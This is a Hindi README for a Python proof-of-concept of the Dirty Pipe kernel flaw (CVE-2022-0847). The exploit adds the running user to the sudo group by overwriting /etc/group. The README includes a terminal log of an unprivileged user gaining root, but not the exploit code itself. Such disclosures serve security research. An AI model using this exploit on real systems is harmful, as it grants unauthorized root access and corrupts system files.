
CVE-2022-0847 Dirty Pipe Vulnerability के लिए Sudo में उपयोगकर्ता जोड़ने का POC एक्सप्लॉइट
यह रिपॉजिटरी मैक्स केलरमैन द्वारा निर्मित भेद्यता, लेखन और एक्सप्लॉइट पर आधारित है, जो सभी यहाँ उपलब्ध हैं।
बाकी सभी की तरह मुझे भी दुनिया के सबसे तुच्छ पुनरुत्पादन योग्य विशेषाधिकार वृद्धि के साथ खेलने का लाभ उठाना पड़ा; ब्लॉग पोस्ट इसे समझाने का बहुत अच्छा काम करता है।
मैंने एक्सप्लॉइट को बेहतर समझने के लिए इसे पायथन में अनुवादित किया, लेकिन यह C एक्सप्लॉइट की एक सटीक प्रतिलिपि है जिसमें Sudo विशेषाधिकार वृद्धि हार्डकोड की गई है।
Python 3.10 (os.splice कॉल के उपयोग के कारण)
sudo प्रविष्टि के ठीक बाद वाली पंक्ति में लिखकर /etc/group फ़ाइल को दूषित करता है। लेकिन जब आप रूट हों, तो आप कॉपी का उपयोग करके इसे ठीक कर सकते हैं।
/etc/group की एक प्रतिलिपि /tmp/group_backup पर रखता है।
test@kali:/home/user/working$ whoami
test
test@kali:/home/user/working$ sudo whoami
test is not in the sudoers file. This incident will be reported.
test@kali:/home/user/working$ python3.10 poc.py
[*] Dirty PIPE POC [*]
[*] Exploit will add test to sudoers
[*] Finding offset of sudo entry in /etc/group
[*] Found sudo group offset
[*] Confirmed it is not last.
[*] Opening /etc/group
[*] Opening PIPE
[*] Contaminating flags of pipe buffer
[*] 65536 bytes written to pipe
[*] 65536 bytes read from pipe
[*] Splicing byte from /etc/group to pipe
[*] Spliced 1 bytes
[*] Altering group to add test
[*] 6 bytes written to /etc/group
test@kali:/home/user/working$ su test
Password:
test@kali:/home/user/working$ sudo whoami
root
test@kali:/home/user/working$